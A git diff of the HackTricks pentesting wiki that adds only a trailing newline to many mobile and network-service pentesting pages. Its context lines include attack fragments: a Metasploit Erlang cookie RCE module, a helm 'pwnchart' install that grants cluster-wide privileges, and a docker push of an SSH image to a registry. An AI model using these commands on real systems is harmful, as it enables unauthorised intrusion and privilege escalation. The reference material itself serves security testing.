url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/smali-changes.md b/src/mobile-pentesting/android-app-pentesting/smali-changes.md index 6d1f372b0..fbf0334bc 100644 --- a/src/mobile-pentesting/android-app-pentesting/smali-changes.md +++ b/src/mobile-pentesting/android-app-pentesting/smali-changes.md @@ -198,3 +198,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md index c23fc8009..a28317f00 100644 --- a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md +++ b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md @@ -35,3 +35,4 @@ In situations where an application is restricted to certain countries, and you'r - [https://manifestsecurity.com/android-application-security-part-23/](https://manifestsecurity.com/android-application-security-part-23/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/tapjacking.md b/src/mobile-pentesting/android-app-pentesting/tapjacking.md index e93bee1d0..56533232a 100644 --- a/src/mobile-pentesting/android-app-pentesting/tapjacking.md +++ b/src/mobile-pentesting/android-app-pentesting/tapjacking.md @@ -69,3 +69,4 @@ The mitigation is relatively simple as the developer may choose not to receive t {% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/webview-attacks.md b/src/mobile-pentesting/android-app-pentesting/webview-attacks.md index 93b9980cb..5b32a0842 100644 --- a/src/mobile-pentesting/android-app-pentesting/webview-attacks.md +++ b/src/mobile-pentesting/android-app-pentesting/webview-attacks.md @@ -145,3 +145,4 @@ xhr.send(null) - [https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I](https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-checklist.md b/src/mobile-pentesting/android-checklist.md index 5b45eaa14..a78896129 100644 --- a/src/mobile-pentesting/android-checklist.md +++ b/src/mobile-pentesting/android-checklist.md @@ -69,3 +69,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/cordova-apps.md b/src/mobile-pentesting/cordova-apps.md index 1862aa162..4f56710e5 100644 --- a/src/mobile-pentesting/cordova-apps.md +++ b/src/mobile-pentesting/cordova-apps.md @@ -61,3 +61,4 @@ This command generates an APK with the debug option enabled, facilitating debugg For those seeking to automate the cloning process, **[MobSecco](https://github.com/Anof-cyber/MobSecco)** is a recommended tool. It streamlines the cloning of Android applications, simplifying the steps outlined above. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting-checklist.md b/src/mobile-pentesting/ios-pentesting-checklist.md index a12c55c5d..7b9ab6e17 100644 --- a/src/mobile-pentesting/ios-pentesting-checklist.md +++ b/src/mobile-pentesting/ios-pentesting-checklist.md @@ -107,3 +107,4 @@ Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banne Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} + diff --git a/src/mobile-pentesting/ios-pentesting/README.md b/src/mobile-pentesting/ios-pentesting/README.md index 6df4d0c56..3e71d2c4e 100644 --- a/src/mobile-pentesting/ios-pentesting/README.md +++ b/src/mobile-pentesting/ios-pentesting/README.md @@ -1205,3 +1205,4 @@ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md b/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md index cbfc7d974..b4802247d 100644 --- a/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md +++ b/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md @@ -201,3 +201,4 @@ To install iPad-specific applications on iPhone or iPod touch devices, the **UID - [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0056/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0056/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md index 1c2f48325..7d00cefed 100644 --- a/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md @@ -102,3 +102,4 @@ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=burp-configuration-for-ios" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md b/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md index f81cfd622..5fa129416 100644 --- a/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md +++ b/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md @@ -45,3 +45,4 @@ Adjusting the `-A num, --after-context=num` flag allows for the display of more **Note**: Direct use of the `strings` command is not recommended for this task due to its limitations in finding relevant information. Instead, employing grep with the `-a` flag on the binary or utilizing radare2 (`izz`)/rabin2 (`-zz`) is advisable for more effective results. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index 759da54a5..2278542b7 100644 --- a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -376,3 +376,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md b/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md index 007d19a46..8059adab8 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md +++ b/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md @@ -52,3 +52,4 @@ Tools like `frida-trace` can aid in understanding the underlying processes, espe - [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-basics.md b/src/mobile-pentesting/ios-pentesting/ios-basics.md index f3340d5ec..5c1827c64 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-basics.md +++ b/src/mobile-pentesting/ios-pentesting/ios-basics.md @@ -136,3 +136,4 @@ This example indicates that the app is compatible with the armv7 instruction set - [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md index 7e10e1aaf..1e1d0d5a7 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md +++ b/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md @@ -81,3 +81,4 @@ However, because the malicious app also registered it and because the used brows - [https://evanconnelly.github.io/post/ios-oauth/](https://evanconnelly.github.io/post/ios-oauth/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md index af7983a64..69fce2eed 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md +++ b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md @@ -259,3 +259,4 @@ Now that you have **enumerated the classes and modules** used by the application ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md index e4887f131..1dac5d1db 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md +++ b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md @@ -3,3 +3,4 @@ # WebView Protocol Handlers {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md index becfe9474..8c9a21e4f 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md +++ b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md @@ -74,3 +74,4 @@ When serializing data, especially to the file system, it's essential to be vigil - [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md index 1ebdf3d41..0c6e75e18 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md +++ b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md @@ -128,3 +128,4 @@ You can try to avoid this detections using **objection's** `ios jailbreak disabl - [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md b/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md index 3ff983b0c..b1c945370 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md +++ b/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md @@ -55,3 +55,4 @@ For **receiving items**, it involves: - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md index 58905e8fc..a6a2b8bb7 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md @@ -85,3 +85,4 @@ setInterval(function () { {% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-universal-links.md b/src/mobile-pentesting/ios-pentesting/ios-universal-links.md index ed0acff54..9f411688c 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-universal-links.md +++ b/src/mobile-pentesting/ios-pentesting/ios-universal-links.md @@ -88,3 +88,4 @@ Through **diligent configuration and validation**, developers can ensure that un - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-webviews.md b/src/mobile-pentesting/ios-pentesting/ios-webviews.md index 5ca47bd2d..7b9cdbb28 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-webviews.md +++ b/src/mobile-pentesting/ios-pentesting/ios-webviews.md @@ -308,3 +308,4 @@ However, be mindful of the limitations: - [https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/xamarin-apps.md b/src/mobile-pentesting/xamarin-apps.md index a762f8a80..eba47802b 100644 --- a/src/mobile-pentesting/xamarin-apps.md +++ b/src/mobile-pentesting/xamarin-apps.md @@ -69,3 +69,4 @@ The tool [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) simpli - [https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf](https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md index 2e8289981..79fdda8dc 100644 --- a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md +++ b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md @@ -24,3 +24,4 @@ nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are defa `ndmp` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1026-pentesting-rusersd.md b/src/network-services-pentesting/1026-pentesting-rusersd.md index 8532119eb..bbbf2f136 100644 --- a/src/network-services-pentesting/1026-pentesting-rusersd.md +++ b/src/network-services-pentesting/1026-pentesting-rusersd.md @@ -20,3 +20,4 @@ katykat potatohead:ttyp5 Sep 1 09:35 14 ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1080-pentesting-socks.md b/src/network-services-pentesting/1080-pentesting-socks.md index cf04a253e..9e8f6524b 100644 --- a/src/network-services-pentesting/1080-pentesting-socks.md +++ b/src/network-services-pentesting/1080-pentesting-socks.md @@ -67,3 +67,4 @@ socks5 10.10.10.10 1080 username password #### More info: [Tunneling and Port Forwarding](../generic-hacking/tunneling-and-port-forwarding.md) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1099-pentesting-java-rmi.md b/src/network-services-pentesting/1099-pentesting-java-rmi.md index 4d8698098..be7f2f7e5 100644 --- a/src/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/src/network-services-pentesting/1099-pentesting-java-rmi.md @@ -328,3 +328,4 @@ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/11211-memcache/README.md b/src/network-services-pentesting/11211-memcache/README.md index 29c2689cd..9d4746e6a 100644 --- a/src/network-services-pentesting/11211-memcache/README.md +++ b/src/network-services-pentesting/11211-memcache/README.md @@ -197,3 +197,4 @@ memcache-commands.md - [https://lzone.de/cheat-sheet/memcached](https://lzone.de/cheat-sheet/memcached) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/11211-memcache/memcache-commands.md b/src/network-services-pentesting/11211-memcache/memcache-commands.md index a76716c85..8901a7f15 100644 --- a/src/network-services-pentesting/11211-memcache/memcache-commands.md +++ b/src/network-services-pentesting/11211-memcache/memcache-commands.md @@ -137,3 +137,4 @@ This at least helps to see if any keys are used. To dump the key names from a PH {% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/113-pentesting-ident.md b/src/network-services-pentesting/113-pentesting-ident.md index e8b8b100a..1de821b66 100644 --- a/src/network-services-pentesting/113-pentesting-ident.md +++ b/src/network-services-pentesting/113-pentesting-ident.md @@ -108,3 +108,4 @@ Entry_2: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/135-pentesting-msrpc.md b/src/network-services-pentesting/135-pentesting-msrpc.md index 14c83bd1c..62e0d6c1f 100644 --- a/src/network-services-pentesting/135-pentesting-msrpc.md +++ b/src/network-services-pentesting/135-pentesting-msrpc.md @@ -126,3 +126,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/137-138-139-pentesting-netbios.md b/src/network-services-pentesting/137-138-139-pentesting-netbios.md index e653ac806..2e03331f5 100644 --- a/src/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/src/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -83,3 +83,4 @@ Entry_2: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1414-pentesting-ibmmq.md b/src/network-services-pentesting/1414-pentesting-ibmmq.md index ac86ce0a7..e2aa4823d 100644 --- a/src/network-services-pentesting/1414-pentesting-ibmmq.md +++ b/src/network-services-pentesting/1414-pentesting-ibmmq.md @@ -360,3 +360,4 @@ CONTAINER ID IMAGE COMMAND CRE - [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec) - [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf) - [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq) + diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md index fd514f72d..06b8f0d03 100644 --- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md +++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md @@ -63,3 +63,4 @@ Entry_2: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md index 454337e59..3ea2d2b24 100644 --- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md +++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md @@ -63,3 +63,4 @@ Entry_2: ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md index b66f756ae..0e792b740 100644 --- a/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md +++ b/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md @@ -64,3 +64,4 @@ hashcat -m 1420 --hex-salt hash.txt wordlist {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1723-pentesting-pptp.md b/src/network-services-pentesting/1723-pentesting-pptp.md index db6ed9de7..68444fe65 100644 --- a/src/network-services-pentesting/1723-pentesting-pptp.md +++ b/src/network-services-pentesting/1723-pentesting-pptp.md @@ -22,3 +22,4 @@ nmap –Pn -sSV -p1723 - [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index 94c94c052..bc004d55d 100644 --- a/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -125,3 +125,4 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header - `port:1883 MQTT` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md index 958828b56..5c5a014c8 100644 --- a/src/network-services-pentesting/2375-pentesting-docker.md +++ b/src/network-services-pentesting/2375-pentesting-docker.md @@ -335,3 +335,4 @@ You can use auditd to monitor docker. - [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md index ebe3540d7..55e3efef5 100644 --- a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md +++ b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md @@ -37,3 +37,4 @@ If you receive an **error trying to mount the filesystem**, you can check the lo And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a different directory is used check for lines similar to: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in the logs) . {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/27017-27018-mongodb.md b/src/network-services-pentesting/27017-27018-mongodb.md index 5e2a8ef6c..2b932b873 100644 --- a/src/network-services-pentesting/27017-27018-mongodb.md +++ b/src/network-services-pentesting/27017-27018-mongodb.md @@ -135,3 +135,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3128-pentesting-squid.md b/src/network-services-pentesting/3128-pentesting-squid.md index c93ba3160..2ec9712cc 100644 --- a/src/network-services-pentesting/3128-pentesting-squid.md +++ b/src/network-services-pentesting/3128-pentesting-squid.md @@ -41,3 +41,4 @@ python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131 ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3260-pentesting-iscsi.md b/src/network-services-pentesting/3260-pentesting-iscsi.md index b09fc2c56..ec1aa2b71 100644 --- a/src/network-services-pentesting/3260-pentesting-iscsi.md +++ b/src/network-services-pentesting/3260-pentesting-iscsi.md @@ -179,3 +179,4 @@ node.conn[0].iscsi.OFMarker = No - [https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3299-pentesting-saprouter.md b/src/network-services-pentesting/3299-pentesting-saprouter.md index 4d249fd4d..2f1b2b235 100644 --- a/src/network-services-pentesting/3299-pentesting-saprouter.md +++ b/src/network-services-pentesting/3299-pentesting-saprouter.md @@ -78,3 +78,4 @@ For more detailed information on Metasploit modules and their usage, visit [Rapi - `port:3299 !HTTP Network packet too big` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3632-pentesting-distcc.md b/src/network-services-pentesting/3632-pentesting-distcc.md index c113d9443..744320dd7 100644 --- a/src/network-services-pentesting/3632-pentesting-distcc.md +++ b/src/network-services-pentesting/3632-pentesting-distcc.md @@ -32,3 +32,4 @@ _I don't think shodan detects this service._ Post created by **Álex B (@r1p)** {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md index 1e26d2793..18fe80f2d 100644 --- a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md +++ b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md @@ -27,3 +27,4 @@ svn up -r 2 #Go to revision 2 inside the checkout folder ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md b/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md index 866e9af03..b3d8cbb78 100644 --- a/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md +++ b/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md @@ -23,3 +23,4 @@ PORT STATE SERVICE ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/43-pentesting-whois.md b/src/network-services-pentesting/43-pentesting-whois.md index 7a673e900..d86a45535 100644 --- a/src/network-services-pentesting/43-pentesting-whois.md +++ b/src/network-services-pentesting/43-pentesting-whois.md @@ -55,3 +55,4 @@ Entry_2: ``` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md index b336aceea..8e68ef299 100644 --- a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md +++ b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md @@ -93,3 +93,4 @@ msf5> use exploit/multi/misc/erlang_cookie_rce - `port:4369 "at port"` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/44134-pentesting-tiller-helm.md b/src/network-services-pentesting/44134-pentesting-tiller-helm.md index edd8b099c..ed693b760 100644 --- a/src/network-services-pentesting/44134-pentesting-tiller-helm.md +++ b/src/network-services-pentesting/44134-pentesting-tiller-helm.md @@ -67,3 +67,4 @@ helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller- In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/44818-ethernetip.md b/src/network-services-pentesting/44818-ethernetip.md index 9ce98b60f..d9d0b9dc5 100644 --- a/src/network-services-pentesting/44818-ethernetip.md +++ b/src/network-services-pentesting/44818-ethernetip.md @@ -24,3 +24,4 @@ python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity - `port:44818 "product name"` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/47808-udp-bacnet.md b/src/network-services-pentesting/47808-udp-bacnet.md index 03dc436d2..2ef3e1a09 100644 --- a/src/network-services-pentesting/47808-udp-bacnet.md +++ b/src/network-services-pentesting/47808-udp-bacnet.md @@ -51,3 +51,4 @@ This script does not attempt to join a BACnet network as a foreign device, it si - `"Instance ID" "Vendor Name"` {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/4786-cisco-smart-install.md b/src/network-services-pentesting/4786-cisco-smart-install.md index 387adc9bf..14b2bf04a 100644 --- a/src/network-services-pentesting/4786-cisco-smart-install.md +++ b/src/network-services-pentesting/4786-cisco-smart-install.md @@ -48,3 +48,4 @@ The switch configuration **10.10.100.10** will be in the **tftp/** folder {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/4840-pentesting-opc-ua.md b/src/network-services-pentesting/4840-pentesting-opc-ua.md index dc2d9ced0..466da28ed 100644 --- a/src/network-services-pentesting/4840-pentesting-opc-ua.md +++ b/src/network-services-pentesting/4840-pentesting-opc-ua.md @@ -54,3 +54,4 @@ To get a clue of the device you have access to, read the "ServerStatus" node val {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/49-pentesting-tacacs+.md b/src/network-services-pentesting/49-pentesting-tacacs+.md index d2ba49213..dbe5b6bda 100644 --- a/src/network-services-pentesting/49-pentesting-tacacs+.md +++ b/src/network-services-pentesting/49-pentesting-tacacs+.md @@ -42,3 +42,4 @@ By gaining access to the control panel of network equipment using the obtained c - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5000-pentesting-docker-registry.md b/src/network-services-pentesting/5000-pentesting-docker-registry.md index 223a2fd0e..aa6e0ef1e 100644 --- a/src/network-services-pentesting/5000-pentesting-docker-registry.md +++ b/src/network-services-pentesting/5000-pentesting-docker-registry.md @@ -315,3 +315,4 @@ docker push registry:5000/sshd-docker-cli #Push it - [https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md index e49b0f04a..301e8ec4a 100644 --- a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md +++ b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md @@ -15,3 +15,4 @@ Unfortunatelly Hadoop lacks support in the Metasploit framework at the time of d It's crucial to note that **Hadoop operates without authentication in its default setup**. However, for enhanced security, configurations are available to integrate Kerberos with HDFS, YARN, and MapReduce services. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md index 39e29921c..8fcd802b5 100644 --- a/src/network-services-pentesting/512-pentesting-rexec.md +++ b/src/network-services-pentesting/512-pentesting-rexec.md @@ -32,3 +32,4 @@ PORT STATE SERVICE {% embed 